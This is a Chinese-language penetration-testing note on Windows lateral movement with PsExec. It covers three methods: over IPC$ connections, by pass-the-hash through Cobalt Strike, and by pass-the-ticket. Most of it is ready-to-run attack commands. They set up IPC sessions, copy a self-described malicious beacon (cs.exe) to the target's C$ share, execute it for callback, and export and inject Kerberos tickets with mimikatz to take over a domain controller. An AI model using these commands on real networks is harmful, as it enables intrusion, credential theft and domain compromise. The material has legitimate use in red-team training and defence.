一.IPC下的PsExec

二.PTH下的psexec（CS操作）

三.PTT下的psexec

---

---

---

---

PsExec工具：

psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口，只需要对方开启admin$共享和ipc$ (该共享默认开启，依赖于445端口)。但是，假如目标主机开启了防火墙（防火墙禁止445端口连接），psexec也是不能使用的，会提示找不到网络路径。由于psexec是Windows提供的工具，所以杀毒软件将其列在白名单中

PsExec常用参数：

psexec.exe \\ip -u administrator -p admin cmd 进⼊半交互式shell

PsExec -accepteula \\192.168.108.101 -s cmd.exe 建立交互的shell

psexec \\ip - uadministrator -p admin -w c:\cmd 进⼊交互式shell，且c:\是⽬标机器的⼯作⽬录

psexec \\ip -u administrator -p admin whoami all 执行命令

psexec \\ip -u administrator -p admin -d c:\beacon.exe 执行文件

psexec \\ip -u administrator -p admin -h -d c:\beacon.exe UAC的⽤⼾权限执行文件

一.IPC下的PsExec

实验利用：

1.先通过信息收集，得到目标机器的账号密码，建立IPC连接

net use \\192.168.11.147\ipc$ " " /user:administrator

2.连接成功以后，查看一下它的IP：

psexec.exe -accepteula \\192.168.11.147 -s ipconfig

3.复制恶意程序

copy C:\Users\admin\Desktop\cs.exe \\192.168.11.147\C$

4.上线CS

psexec.exe -accepteula \\192.168.11.147 -h -d c:\cs.exe

二.PTH下的psexec，（CS操作）

1.通过信息收集，找到登录凭证

2.找到通过扫描的目标地址

3.进行psexec攻击上线

4.成功上线

三.PTT下的psexec

1.上传psexec

2.导出内存的票据：

mimikatz  sekurlsa::tickets /export

3.清除内存中的票据

shell klist purge

mimikatz kerberos::purge

4.将高权限的票据文件注入内存

mimikatz kerberos::ptt [0;1aa366]-2-0-40e10000-Administrator@krbtgt-HACK.COM.kirbi

5.查看票据：

shell klist

mimikatz kerberos::tgt

6.远程复制：

copy C:\Users\admin\Desktop\cs.exe \\dc.hack.com\C$

7.远程上线域控

shell psexec.exe -accepteula \\dc.hack.com -h -d c:\cs.exe